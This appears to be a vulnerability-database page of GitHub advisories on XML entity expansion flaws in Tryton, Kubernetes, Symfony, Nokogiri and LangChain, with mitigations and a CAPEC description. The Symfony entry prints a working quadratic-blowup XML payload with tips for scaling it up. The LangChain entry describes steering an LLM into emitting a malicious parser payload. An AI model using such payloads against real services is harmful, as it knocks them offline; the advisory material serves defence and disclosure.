An XML Entity Expansion (XEE) issue was discovered in Tryton Application Platform (Server) 5.x through 5.0.45, 6.x through 6.0.15, and 6.1.x and 6.2.x through 6.2.5, and Tryton Application Platform (Command Line Client (proteus)) 5.x through 5.0.11, 6.x through 6.0.4, and 6.1.x and 6.2.x through 6.2.1. An unauthenticated user can send a crafted XML-RPC message to consume all the resources of the server.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "trytond"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.46"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "trytond"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.0.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "trytond"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.1.0"
            },
            {
              "fixed": "6.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "proteus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "proteus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "proteus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.1.0"
            },
            {
              "fixed": "6.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-26662"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-03-28T15:54:14Z",
    "nvd_published_at": "2022-03-10T17:47:00Z",
    "severity": "HIGH"
  },
  "details": "An XML Entity Expansion (XEE) issue was discovered in Tryton Application Platform (Server) 5.x through 5.0.45, 6.x through 6.0.15, and 6.1.x and 6.2.x through 6.2.5, and Tryton Application Platform (Command Line Client (proteus)) 5.x through 5.0.11, 6.x through 6.0.4, and 6.1.x and 6.2.x through 6.2.1. An unauthenticated user can send a crafted XML-RPC message to consume all the resources of the server.",
  "id": "GHSA-pm3h-mm62-pwm8",
  "modified": "2022-03-28T15:56:34Z",
  "published": "2022-03-11T00:02:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26662"
    },
    {
      "type": "WEB",
      "url": "https://bugs.tryton.org/issue11244"
    },
    {
      "type": "WEB",
      "url": "https://discuss.tryton.org/t/security-release-for-issue11219-and-issue11244/5059"
    },
    {
      "type": "PACKAGE",
      "url": "https://hg.tryton.org/trytond"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00016.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5098"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5099"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XML Entity Expansion in trytond and proteus"
}

GHSA-PMQP-H87C-MR78

Vulnerability from github – Published: 2021-05-18 15:38 – Updated: 2026-02-27 20:08
VLAI
Summary
XML Entity Expansion and Improper Input Validation in Kubernetes API server
Details

Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility.

Specific Go Packages Affected

k8s.io/kubernetes/pkg/apiserver

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.13.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.14.0"
            },
            {
              "fixed": "1.14.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.15.0"
            },
            {
              "fixed": "1.15.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "fixed": "1.16.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-11253"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-17T21:06:33Z",
    "nvd_published_at": "2019-10-17T16:15:10Z",
    "severity": "HIGH"
  },
  "details": "Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility.\n\n### Specific Go Packages Affected\nk8s.io/kubernetes/pkg/apiserver",
  "id": "GHSA-pmqp-h87c-mr78",
  "modified": "2026-02-27T20:08:47Z",
  "published": "2021-05-18T15:38:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/kubernetes/issues/83253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/kubernetes/pull/83261"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3239"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3811"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3905"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/bgeesaman/0e0349e94cd22c48bf14d8a9b7d6b8f2"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/forum/#!topic/kubernetes-security-announce/jk8polzSUxs"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2022-0703"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20191031-0006"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XML Entity Expansion and Improper Input Validation in Kubernetes API server"
}

GHSA-Q2GC-GG3X-7942

Vulnerability from github – Published: 2024-05-30 12:21 – Updated: 2024-05-30 12:21
VLAI
Summary
Symfony XML Entity Expansion security vulnerability
Details

Symfony 2.0.11 carried a [similar] XXE security fix, however, on review of ZF2 I also noted a vulnerability to XML Entity Expansion (XEE) attacks whereby all extensions making use of libxml2 have no defense against XEE Quadratic Blowup Attacks. The vulnerability is a function of there being no current method of disabling custom entities in PHP (i.e. defined internal to the XML document without using external entities). In a QBA, a long entity can be defined and then referred to multiple times in document elements, creating a memory sink with which Denial Of Service attacks against a host's RAM can be mounted. The use of the LIBXML_NOENT or equivalent option in a dependent extension amplified the impact (it doesn't actually mean "No Entities"). In addition, libxml2's innate defense against the related Exponential or Billion Laugh's XEE attacks is active only so long as the LIBXML_PARSEHUGE is NOT set (it disables libxml2's hardcoded entity recursion limit). No instances of these two options were noted, but it's worth referencing for the future.

Consider this (non-fatal) example:

]> &a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a; Increase the length of entity, and entity count to a few hundred, and peak memory usage will waste no time spiking the moment the nodeValue for is accessed since the entities will then be expanded by a simple multiplier effect. No external entities required.

...

This can be used in combination with the usual XXE defense of calling libxml_disable_entity_loader(TRUE) and, optionally, the LIBXML_NONET option (should local filesystem access be allowable). The DOCTYPE may be removed instead of rejecting the XML outright but this would likely result in other problems with the unresolved entities.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/symfony"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.0.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-30T12:21:00Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Symfony 2.0.11 carried a [similar] XXE security fix, however, on review of ZF2 I also noted a vulnerability to XML Entity Expansion (XEE) attacks whereby all extensions making use of libxml2 have no defense against XEE Quadratic Blowup Attacks. The vulnerability is a function of there being no current method of disabling custom entities in PHP (i.e. defined internal to the XML document without using external entities). In a QBA, a long entity can be defined and then referred to multiple times in document elements, creating a memory sink with which Denial Of Service attacks against a host\u0027s RAM can be mounted. The use of the LIBXML_NOENT or equivalent option in a dependent extension amplified the impact (it doesn\u0027t actually mean \"No Entities\"). In addition, libxml2\u0027s innate defense against the related Exponential or Billion Laugh\u0027s XEE attacks is active only so long as the LIBXML_PARSEHUGE is NOT set (it disables libxml2\u0027s hardcoded entity recursion limit). No instances of these two options were noted, but it\u0027s worth referencing for the future.\n\nConsider this (non-fatal) example:\n\n\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE data [\u003c!ENTITY a\n\"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\u003e]\u003e\n\u003cdata\u003e\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u0026a;\u003c/data\u003e\nIncrease the length of entity, and entity count to a few hundred, and peak memory usage will waste no time spiking the moment the nodeValue for is accessed since the entities will then be expanded by a simple multiplier effect. No external entities required.\n\n...\n\nThis can be used in combination with the usual XXE defense of calling libxml_disable_entity_loader(TRUE) and, optionally, the LIBXML_NONET option (should local filesystem access be allowable). The DOCTYPE may be removed instead of rejecting the XML outright but this would likely result in other problems with the unresolved entities. ",
  "id": "GHSA-q2gc-gg3x-7942",
  "modified": "2024-05-30T12:21:00Z",
  "published": "2024-05-30T12:21:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/2012-08-28.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/symfony/symfony"
    },
    {
      "type": "WEB",
      "url": "https://github.com/symfony/symfony/blob/2.0/CHANGELOG-2.0.md"
    },
    {
      "type": "WEB",
      "url": "https://github.com/symfony/symfony/compare/352e8f583c87c709de197bb16c4053d2e87fd4cd...5bf4f92e86c34690d71e8f94350ec975909a435b.diff"
    },
    {
      "type": "WEB",
      "url": "https://symfony.com/blog/security-release-symfony-2-0-17-released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Symfony XML Entity Expansion security vulnerability"
}

GHSA-Q7WX-62R7-J2X7

Vulnerability from github – Published: 2018-08-08 22:31 – Updated: 2023-03-14 19:07
VLAI
Summary
Nokogiri vulnerable to libxml XML Entity Expansion
Details

The xmlreader in libxml allows remote attackers to cause a denial of service (memory consumption) via crafted XML data, related to an XML Entity Expansion (XEE) attack.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.6.6.3"
      },
      "package": {
        "ecosystem": "RubyGems",
        "name": "nokogiri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.6.0"
            },
            {
              "fixed": "1.6.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2015-1819"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:51:25Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The xmlreader in libxml allows remote attackers to cause a denial of service (memory consumption) via crafted XML data, related to an XML Entity Expansion (XEE) attack.",
  "id": "GHSA-q7wx-62r7-j2x7",
  "modified": "2023-03-14T19:07:20Z",
  "published": "2018-08-08T22:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1819"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sparklemotion/nokogiri/issues/1374"
    },
    {
      "type": "WEB",
      "url": "https://git.gnome.org/browse/libxml2/commit/?id=213f1fe0d76d30eaed6e5853057defc43e6df2c9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/nokogiri/CVE-2015-1819.yml"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201507-08"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201701-37"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT206166"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT206167"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT206168"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT206169"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00001.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00002.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-November/172710.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-November/172943.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00120.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00031.html"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2015-1419.html"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2015-2550.html"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2015/dsa-3430"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-2812-1"
    },
    {
      "type": "WEB",
      "url": "http://xmlsoft.org/news.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Nokogiri vulnerable to libxml XML Entity Expansion"
}

GHSA-Q84M-RMW3-4382

Vulnerability from github – Published: 2024-03-26 15:30 – Updated: 2024-03-27 17:46
VLAI
Summary
LangChain's XMLOutputParser vulnerable to XML Entity Expansion
Details

The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.html

This primarily affects users that combine an LLM (or agent) with the XMLOutputParser and expose the component via an endpoint on a web-service.

This would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise the availability of the service.

A successful attack is predicated on:

  1. Usage of XMLOutputParser
  2. Passing of malicious input into the XMLOutputParser either directly or by trying to manipulate an LLM to do so on the users behalf
  3. Exposing the component via a web-service
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langchain-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-1455"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-26T21:22:28Z",
    "nvd_published_at": "2024-03-26T14:15:08Z",
    "severity": "MODERATE"
  },
  "details": "The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.html\n\nThis primarily affects users that combine an LLM (or agent) with the `XMLOutputParser` and expose the component via an endpoint on a web-service. \n\nThis would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise the availability of the service.\n\nA successful attack is predicated on:\n\n1. Usage of XMLOutputParser\n2. Passing of malicious input into the XMLOutputParser either directly or by trying to manipulate an LLM to do so on the users behalf\n3. Exposing the component via a web-service",
  "id": "GHSA-q84m-rmw3-4382",
  "modified": "2024-03-27T17:46:43Z",
  "published": "2024-03-26T15:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1455"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langchain/pull/17250"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langchain/pull/19653"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langchain/pull/19660"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langchain/commit/727d5023ce88e18e3074ef620a98137d26ff92a3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langchain-ai/langchain"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/4353571f-c70d-4bfd-ac08-3a89cecb45b6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LangChain\u0027s XMLOutputParser vulnerable to XML Entity Expansion"
}

Mitigation
Operation

If possible, prohibit the use of DTDs or use an XML parser that limits the expansion of recursive DTD entities.

Mitigation
Implementation

Before parsing XML files with associated DTDs, scan for recursive entity declarations and do not continue parsing potentially explosive content.

CAPEC-197: Exponential Data Expansion

An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.